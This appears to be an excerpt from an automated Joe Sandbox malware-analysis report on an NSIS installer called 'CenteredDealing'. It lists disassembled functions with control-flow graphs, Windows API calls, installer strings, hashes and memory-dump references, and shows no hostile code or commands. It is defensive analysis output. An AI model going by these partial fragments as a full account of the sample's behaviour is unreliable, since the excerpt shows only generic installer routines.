                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                        • String ID: 155$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                        • API String ID: 4286501637-2913159529
                                                                                                                                                                                                                                                                        • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                                                                                                                                                        Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                        • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                        • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                        • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                                                                                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                                                                                        • API String ID: 651206458-1535804072
                                                                                                                                                                                                                                                                        • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                                                                                                                                                        Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                        • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                                                                                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(007C22B0), ref: 00402387
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                        • String ID: 155$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                        • API String ID: 1459762280-3885096119
                                                                                                                                                                                                                                                                        • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                                                                                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(007C22B0), ref: 00402387
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                        • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                                                                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                        • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                                                                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                        control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1683210739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683124167.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683238009.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683263206.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1683450250.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                        Similarity
